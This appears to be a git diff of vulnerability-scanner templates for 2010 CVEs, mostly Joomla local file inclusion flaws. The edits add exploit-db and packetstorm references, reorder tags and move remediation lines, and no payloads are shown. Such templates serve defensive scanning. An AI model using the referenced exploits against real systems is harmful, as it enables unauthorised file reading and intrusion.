     - https://www.exploit-db.com/exploits/12236
     - https://www.cvedetails.com/cve/CVE-2010-1601
+    - http://web.archive.org/web/20140803084823/http://secunia.com/advisories/39472/
+    - http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txt
   classification:
     cve-id: CVE-2010-1601
-  tags: cve,cve2010,joomla,lfi
+  tags: cve2010,joomla,lfi,edb,packetstorm,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1602.yaml b/cves/2010/CVE-2010-1602.yaml
index 63a8d37726..7ea5cac135 100644
--- a/cves/2010/CVE-2010-1602.yaml
+++ b/cves/2010/CVE-2010-1602.yaml
@@ -8,9 +8,10 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12283
     - https://www.cvedetails.com/cve/CVE-2010-1602
+    - http://packetstormsecurity.org/1004-exploits/joomlazimbcomment-lfi.txt
   classification:
     cve-id: CVE-2010-1602
-  tags: cve,cve2010,joomla,lfi
+  tags: lfi,edb,packetstorm,cve,cve2010,joomla
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1603.yaml b/cves/2010/CVE-2010-1603.yaml
index 962fe63461..cea0d41ac0 100644
--- a/cves/2010/CVE-2010-1603.yaml
+++ b/cves/2010/CVE-2010-1603.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12284
     - https://www.cvedetails.com/cve/CVE-2010-1603
+    - http://web.archive.org/web/20210518112730/https://www.securityfocus.com/bid/39546
+    - http://www.vupen.com/english/advisories/2010/0931
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1603
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve2010,joomla,lfi,edb,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1607.yaml b/cves/2010/CVE-2010-1607.yaml
index 91f7796f72..434bfacdfe 100644
--- a/cves/2010/CVE-2010-1607.yaml
+++ b/cves/2010/CVE-2010-1607.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12316
     - https://www.cvedetails.com/cve/CVE-2010-1607
+    - http://web.archive.org/web/20210121195713/https://www.securityfocus.com/bid/39608/
+    - http://web.archive.org/web/20111227231442/http://secunia.com/advisories/39539/
   classification:
     cve-id: CVE-2010-1607
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1653.yaml b/cves/2010/CVE-2010-1653.yaml
index 584e220b6b..eefedff98e 100644
--- a/cves/2010/CVE-2010-1653.yaml
+++ b/cves/2010/CVE-2010-1653.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12430
     - https://www.cvedetails.com/cve/CVE-2010-1653
+    - http://packetstormsecurity.org/1004-exploits/joomlagraphics-lfi.txt
+    - http://web.archive.org/web/20210121195909/https://www.securityfocus.com/bid/39743/
   classification:
     cve-id: CVE-2010-1653
-  tags: cve,cve2010,joomla,lfi
+  tags: edb,packetstorm,cve,cve2010,joomla,lfi
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1657.yaml b/cves/2010/CVE-2010-1657.yaml
index 7a227fe4f2..ca854101b6 100644
--- a/cves/2010/CVE-2010-1657.yaml
+++ b/cves/2010/CVE-2010-1657.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2010-1657
     - https://www.exploit-db.com/exploits/12428
+    - http://www.vupen.com/english/advisories/2010/1006
+    - http://web.archive.org/web/20210121195906/https://www.securityfocus.com/bid/39740/
   classification:
     cve-id: CVE-2010-1657
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1658.yaml b/cves/2010/CVE-2010-1658.yaml
index cf60ccf129..c2c6ba0371 100644
--- a/cves/2010/CVE-2010-1658.yaml
+++ b/cves/2010/CVE-2010-1658.yaml
@@ -8,9 +8,10 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12427
     - https://www.cvedetails.com/cve/CVE-2010-1658
+    - http://www.vupen.com/english/advisories/2010/1007
   classification:
     cve-id: CVE-2010-1658
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1659.yaml b/cves/2010/CVE-2010-1659.yaml
index 3d326d3d79..92c469cc49 100644
--- a/cves/2010/CVE-2010-1659.yaml
+++ b/cves/2010/CVE-2010-1659.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12426
     - https://nvd.nist.gov/vuln/detail/CVE-2010-1659
+    - http://web.archive.org/web/20210121195906/https://www.securityfocus.com/bid/39739/
+    - http://www.exploit-db.com/exploits/12426
   classification:
     cve-id: CVE-2010-1659
-  tags: cve,cve2010,joomla,lfi
+  tags: cve2010,joomla,lfi,edb,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1714.yaml b/cves/2010/CVE-2010-1714.yaml
index 573ea301b2..b088feba43 100644
--- a/cves/2010/CVE-2010-1714.yaml
+++ b/cves/2010/CVE-2010-1714.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12168
     - https://www.cvedetails.com/cve/CVE-2010-1714
+    - http://packetstormsecurity.org/1004-exploits/joomlaarcadegames-lfi.txt
+    - http://web.archive.org/web/20140723192327/http://secunia.com/advisories/39413/
   classification:
     cve-id: CVE-2010-1714
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1715.yaml b/cves/2010/CVE-2010-1715.yaml
index 96a7921454..b991fb91dc 100644
--- a/cves/2010/CVE-2010-1715.yaml
+++ b/cves/2010/CVE-2010-1715.yaml
@@ -8,9 +8,10 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12174
     - https://www.cvedetails.com/cve/CVE-2010-1715
+    - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt
   classification:
     cve-id: CVE-2010-1715
-  tags: cve,cve2010,joomla,lfi
+  tags: joomla,lfi,edb,packetstorm,cve,cve2010
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1717.yaml b/cves/2010/CVE-2010-1717.yaml
index 0d73b37fcc..3d72e3973f 100644
--- a/cves/2010/CVE-2010-1717.yaml
+++ b/cves/2010/CVE-2010-1717.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12291
     - https://www.cvedetails.com/cve/CVE-2010-1717
+    - http://web.archive.org/web/20140805095004/http://secunia.com/advisories/39526/
+    - http://www.vupen.com/english/advisories/2010/0924
   classification:
     cve-id: CVE-2010-1717
-  tags: cve,cve2010,joomla,lfi
+  tags: cve2010,joomla,lfi,edb,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1718.yaml b/cves/2010/CVE-2010-1718.yaml
index 8127f88b49..a70b5e7b3f 100644
--- a/cves/2010/CVE-2010-1718.yaml
+++ b/cves/2010/CVE-2010-1718.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12282
     - https://www.cvedetails.com/cve/CVE-2010-1718
+    - http://web.archive.org/web/20140805094212/http://secunia.com/advisories/39521/
+    - http://web.archive.org/web/20210121195621/https://www.securityfocus.com/bid/39545/
   classification:
     cve-id: CVE-2010-1718
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1719.yaml b/cves/2010/CVE-2010-1719.yaml
index 52bc7b9493..0cc0b497f2 100644
--- a/cves/2010/CVE-2010-1719.yaml
+++ b/cves/2010/CVE-2010-1719.yaml
@@ -8,9 +8,10 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12233
     - https://www.cvedetails.com/cve/CVE-2010-1719
+    - http://www.exploit-db.com/exploits/12233
   classification:
     cve-id: CVE-2010-1719
-  tags: cve,cve2010,joomla,lfi
+  tags: lfi,edb,cve,cve2010,joomla
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1722.yaml b/cves/2010/CVE-2010-1722.yaml
index 31324d2d5d..f155d6b950 100644
--- a/cves/2010/CVE-2010-1722.yaml
+++ b/cves/2010/CVE-2010-1722.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12177
     - https://www.cvedetails.com/cve/CVE-2010-1722
+    - http://web.archive.org/web/20140723201810/http://secunia.com/advisories/39409/
+    - http://www.exploit-db.com/exploits/12177
   classification:
     cve-id: CVE-2010-1722
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1723.yaml b/cves/2010/CVE-2010-1723.yaml
index f504d1d508..75b3e0903c 100644
--- a/cves/2010/CVE-2010-1723.yaml
+++ b/cves/2010/CVE-2010-1723.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12289
     - https://www.cvedetails.com/cve/CVE-2010-1723
+    - http://web.archive.org/web/20140805101847/http://secunia.com/advisories/39524/
+    - http://www.exploit-db.com/exploits/12289
   classification:
     cve-id: CVE-2010-1723
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1858.yaml b/cves/2010/CVE-2010-1858.yaml
index 3a91c1523b..9e87647ddb 100644
--- a/cves/2010/CVE-2010-1858.yaml
+++ b/cves/2010/CVE-2010-1858.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/11853
     - https://www.cvedetails.com/cve/CVE-2010-1858
+    - http://web.archive.org/web/20210121194940/https://www.securityfocus.com/bid/38911/
+    - http://packetstormsecurity.org/1003-exploits/joomlasmestorage-lfi.txt
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1858
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve2010,joomla,lfi,edb,packetstorm,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1870.yaml b/cves/2010/CVE-2010-1870.yaml
index cbb0c289a7..d9cb416a40 100644
--- a/cves/2010/CVE-2010-1870.yaml
+++ b/cves/2010/CVE-2010-1870.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://www.securifera.com/advisories/sec-2020-0001/
     - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
+    - https://www.exploit-db.com/exploits/14360
+    - http://confluence.atlassian.com/display/FISHEYE/FishEye+Security+Advisory+2010-06-16
   classification:
     cvss-metrics: AV:N/AC:L/Au:N/C:N/I:P/A:N
-    cvss-score: 5.0
+    cvss-score: 5
     cve-id: CVE-2010-1870
     cwe-id: CWE-917
-  tags: cve,cve2010,rce,listserv,ognl
+  tags: packetstorm,edb,cve,cve2010,rce,listserv,ognl
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1875.yaml b/cves/2010/CVE-2010-1875.yaml
index 3d1892a1ac..c3585c1038 100644
--- a/cves/2010/CVE-2010-1875.yaml
+++ b/cves/2010/CVE-2010-1875.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/11851
     - https://www.cvedetails.com/cve/CVE-2010-1875
+    - http://web.archive.org/web/20140802140355/http://secunia.com/advisories/39074/
+    - http://web.archive.org/web/20210121194939/https://www.securityfocus.com/bid/38912/
   classification:
     cve-id: CVE-2010-1875
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1878.yaml b/cves/2010/CVE-2010-1878.yaml
index 7f22a2f09b..2204b99fec 100644
--- a/cves/2010/CVE-2010-1878.yaml
+++ b/cves/2010/CVE-2010-1878.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12317
     - https://www.cvedetails.com/cve/CVE-2010-1878
+    - http://web.archive.org/web/20210121195712/https://www.securityfocus.com/bid/39606/
+    - http://packetstormsecurity.org/1004-exploits/joomlaorgchart-lfi.txt
   classification:
     cve-id: CVE-2010-1878
-  tags: cve,cve2010,joomla,lfi
+  tags: lfi,edb,packetstorm,cve,cve2010,joomla
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1952.yaml b/cves/2010/CVE-2010-1952.yaml
index 46514a4fd0..0e3c8d8590 100644
--- a/cves/2010/CVE-2010-1952.yaml
+++ b/cves/2010/CVE-2010-1952.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12239
     - https://www.cvedetails.com/cve/CVE-2010-1952
+    - http://web.archive.org/web/20151016194238/http://secunia.com/advisories/39475/
+    - http://www.exploit-db.com/exploits/12239
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1952
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1953.yaml b/cves/2010/CVE-2010-1953.yaml
index 0c4f1002ce..33803c361e 100644
--- a/cves/2010/CVE-2010-1953.yaml
+++ b/cves/2010/CVE-2010-1953.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12288
     - https://www.cvedetails.com/cve/CVE-2010-1953
+    - http://www.vupen.com/english/advisories/2010/0927
+    - http://www.exploit-db.com/exploits/12288
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1953
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve2010,joomla,lfi,edb,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1954.yaml b/cves/2010/CVE-2010-1954.yaml
index f328fbf262..563749ac73 100644
--- a/cves/2010/CVE-2010-1954.yaml
+++ b/cves/2010/CVE-2010-1954.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12287
     - https://www.cvedetails.com/cve/CVE-2010-1954
+    - http://web.archive.org/web/20210121195625/https://www.securityfocus.com/bid/39552/
+    - http://www.exploit-db.com/exploits/12287
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1954
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: edb,cve,cve2010,joomla,lfi
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1955.yaml b/cves/2010/CVE-2010-1955.yaml
index d514f8de8b..5a64f68bc5 100644
--- a/cves/2010/CVE-2010-1955.yaml
+++ b/cves/2010/CVE-2010-1955.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12238
     - https://www.cvedetails.com/cve/CVE-2010-1955
+    - http://web.archive.org/web/20210121195552/https://www.securityfocus.com/bid/39508/
+    - http://web.archive.org/web/20140803091440/http://secunia.com/advisories/39473/
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1955
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: lfi,edb,cve,cve2010,joomla
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1956.yaml b/cves/2010/CVE-2010-1956.yaml
index db5fd91493..40d609582a 100644
--- a/cves/2010/CVE-2010-1956.yaml
+++ b/cves/2010/CVE-2010-1956.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12285
     - https://www.cvedetails.com/cve/CVE-2010-1956
+    - http://web.archive.org/web/20140805105431/http://secunia.com/advisories/39522/
+    - http://www.exploit-db.com/exploits/12285
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1956
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: joomla,lfi,edb,cve,cve2010
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1957.yaml b/cves/2010/CVE-2010-1957.yaml
index 8e03d5dd90..98363e98d2 100644
--- a/cves/2010/CVE-2010-1957.yaml
+++ b/cves/2010/CVE-2010-1957.yaml
@@ -8,10 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12235
     - https://www.cvedetails.com/cve/CVE-2010-1957
+    - http://packetstormsecurity.org/1004-exploits/joomlalovefactory-lfi.txt
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1957
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: lfi,edb,packetstorm,cve,cve2010,joomla
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1977.yaml b/cves/2010/CVE-2010-1977.yaml
index b78f48fbd2..62d676323f 100644
--- a/cves/2010/CVE-2010-1977.yaml
+++ b/cves/2010/CVE-2010-1977.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12083
     - https://www.cvedetails.com/cve/CVE-2010-1977
+    - http://web.archive.org/web/20210121195306/https://www.securityfocus.com/bid/39243/
+    - http://web.archive.org/web/20140724201603/http://secunia.com/advisories/39356/
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1977
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: edb,cve,cve2010,joomla,lfi
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1979.yaml b/cves/2010/CVE-2010-1979.yaml
index caa75776ef..7f083ff294 100644
--- a/cves/2010/CVE-2010-1979.yaml
+++ b/cves/2010/CVE-2010-1979.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12088
     - https://www.cvedetails.com/cve/CVE-2010-1979
+    - http://web.archive.org/web/20140724185517/http://secunia.com/advisories/39360/
+    - http://www.exploit-db.com/exploits/12088
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1979
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: edb,cve,cve2010,joomla,lfi
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1980.yaml b/cves/2010/CVE-2010-1980.yaml
index cdf77adef5..9d7f73a0c4 100644
--- a/cves/2010/CVE-2010-1980.yaml
+++ b/cves/2010/CVE-2010-1980.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12085
     - https://www.cvedetails.com/cve/CVE-2010-1980
+    - http://packetstormsecurity.org/1004-exploits/joomlaflickr-lfi.txt
+    - http://www.exploit-db.com/exploits/12085
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1980
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: lfi,edb,packetstorm,cve,cve2010,joomla
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1981.yaml b/cves/2010/CVE-2010-1981.yaml
index 86d7dd3d54..9b0586ed87 100644
--- a/cves/2010/CVE-2010-1981.yaml
+++ b/cves/2010/CVE-2010-1981.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12087
     - https://www.cvedetails.com/cve/CVE-2010-1981
+    - http://packetstormsecurity.org/1004-exploits/joomlafabrik-lfi.txt
+    - http://www.exploit-db.com/exploits/12087
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1981
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1982.yaml b/cves/2010/CVE-2010-1982.yaml
index b78ef5a1d8..a11af27071 100644
--- a/cves/2010/CVE-2010-1982.yaml
+++ b/cves/2010/CVE-2010-1982.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12121
     - https://www.cvedetails.com/cve/CVE-2010-1982
+    - http://web.archive.org/web/20140723233933/http://secunia.com/advisories/39202/
+    - http://web.archive.org/web/20210121195400/https://www.securityfocus.com/bid/39343/
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1982
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1983.yaml b/cves/2010/CVE-2010-1983.yaml
index 82d4e0764b..3ce379a6df 100644
--- a/cves/2010/CVE-2010-1983.yaml
+++ b/cves/2010/CVE-2010-1983.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12055
     - https://www.cvedetails.com/cve/CVE-2010-1983
+    - http://packetstormsecurity.org/1004-exploits/joomlaredtwitter-lfi.txt
+    - http://www.exploit-db.com/exploits/12055
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1983
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: joomla,lfi,edb,packetstorm,cve,cve2010
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-2033.yaml b/cves/2010/CVE-2010-2033.yaml
index 082fc18a36..c961bef8ea 100644
--- a/cves/2010/CVE-2010-2033.yaml
+++ b/cves/2010/CVE-2010-2033.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
     - https://www.cvedetails.com/cve/CVE-2010-2033
+    - http://web.archive.org/web/20140805143014/http://secunia.com/advisories/39873/
+    - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-2033
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: packetstorm,cve,cve2010,joomla,lfi
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-2034.yaml b/cves/2010/CVE-2010-2034.yaml
index 07d6b9831a..04f804fda0 100644
--- a/cves/2010/CVE-2010-2034.yaml
+++ b/cves/2010/CVE-2010-2034.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/34003
     - https://www.cvedetails.com/cve/CVE-2010-2034
+    - http://packetstormsecurity.org/1005-exploits/joomlaperchaia-lfi.txt
+    - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-2034
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: edb,packetstorm,cve,cve2010,joomla,lfi
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-2035.yaml b/cves/2010/CVE-2010-2035.yaml
index 2d1998e086..091206bed2 100644
--- a/cves/2010/CVE-2010-2035.yaml
+++ b/cves/2010/CVE-2010-2035.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/34006
     - https://www.cvedetails.com/cve/CVE-2010-2035
+    - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244
+    - http://packetstormsecurity.org/1005-exploits/joomlaperchagl-lfi.txt
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-2035
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: packetstorm,cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-2036.yaml b/cves/2010/CVE-2010-2036.yaml
index 6bf06fc8e0..108e86df89 100644
--- a/cves/2010/CVE-2010-2036.yaml
+++ b/cves/2010/CVE-2010-2036.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/34004
     - https://www.cvedetails.com/cve/CVE-2010-2036
+    - http://packetstormsecurity.org/1005-exploits/joomlaperchafa-lfi.txt
+    - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-2036
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,lfi,joomla
+  tags: cve2010,lfi,joomla,edb,packetstorm,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-2037.yaml b/cves/2010/CVE-2010-2037.yaml
index 737569005f..25f2e3df11 100644
--- a/cves/2010/CVE-2010-2037.yaml
+++ b/cves/2010/CVE-2010-2037.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/34005
     - https://www.cvedetails.com/cve/CVE-2010-2037
+    - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244
+    - http://packetstormsecurity.org/1005-exploits/joomlaperchada-lfi.txt
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-2037
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,lfi,joomla
+  tags: joomla,edb,packetstorm,cve,cve2010,lfi
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-2045.yaml b/cves/2010/CVE-2010-2045.yaml
index 48e702ef20..6d407ff966 100644
--- a/cves/2010/CVE-2010-2045.yaml
+++ b/cves/2010/CVE-2010-2045.yaml
@@ -8,10 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12595
     - https://www.cvedetails.com/cve/CVE-2010-2045
+    - http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-2045
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-2050.yaml b/cves/2010/CVE-2010-2050.yaml
index eef5f84f42..ae40b3ac41 100644
--- a/cves/2010/CVE-2010-2050.yaml
+++ b/cves/2010/CVE-2010-2050.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12611
     - https://www.cvedetails.com/cve/CVE-2010-2050
+    - http://web.archive.org/web/20210121200643/https://www.securityfocus.com/bid/40185/
+    - http://packetstormsecurity.org/1005-exploits/joomlamscomment-lfi.txt
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-2050
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve2010,joomla,lfi,edb,packetstorm,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-2122.yaml b/cves/2010/CVE-2010-2122.yaml
index ed2f24987f..9ac39bcc09 100644
--- a/cves/2010/CVE-2010-2122.yaml
+++ b/cves/2010/CVE-2010-2122.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12623
     - https://www.cvedetails.com/cve/CVE-2010-2122
+    - https://www.exploit-db.com/exploits/12618
+    - http://web.archive.org/web/20210624180854/https://www.securityfocus.com/bid/40192
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-2122
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-2128.yaml b/cves/2010/CVE-2010-2128.yaml
index 0c0221972a..70510e8ed0 100644
--- a/cves/2010/CVE-2010-2128.yaml
+++ b/cves/2010/CVE-2010-2128.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12607
     - https://www.cvedetails.com/cve/CVE-2010-2128
+    - http://web.archive.org/web/20140801195113/http://secunia.com/advisories/39832/
+    - http://www.exploit-db.com/exploits/12607
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-2128
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-2259.yaml b/cves/2010/CVE-2010-2259.yaml
index 8938e35b5d..97477fcdd8 100644
--- a/cves/2010/CVE-2010-2259.yaml
+++ b/cves/2010/CVE-2010-2259.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/10946
     - https://www.cvedetails.com/cve/CVE-2010-2259
+    - http://web.archive.org/web/20140724121430/http://secunia.com/advisories/37866/
+    - http://www.exploit-db.com/exploits/10946
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-2259
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve2010,joomla,lfi,edb,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-2307.yaml b/cves/2010/CVE-2010-2307.yaml
index 201f2aea94..566b2b3892 100644
--- a/cves/2010/CVE-2010-2307.yaml
+++ b/cves/2010/CVE-2010-2307.yaml
@@ -6,12 +6,14 @@ info:
   severity: high
   description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
   reference:
-    - https://www.securityfocus.com/bid/40550/info
+    - http://web.archive.org/web/20210120195654/https://www.securityfocus.com/bid/40550/info
     - https://nvd.nist.gov/vuln/detail/CVE-2010-2307
+    - https://www.exploit-db.com/exploits/12865
+    - http://www.exploit-db.com/exploits/12865
+  remediation: Upgrade to a supported product version.
   classification:
     cve-id: CVE-2010-2307
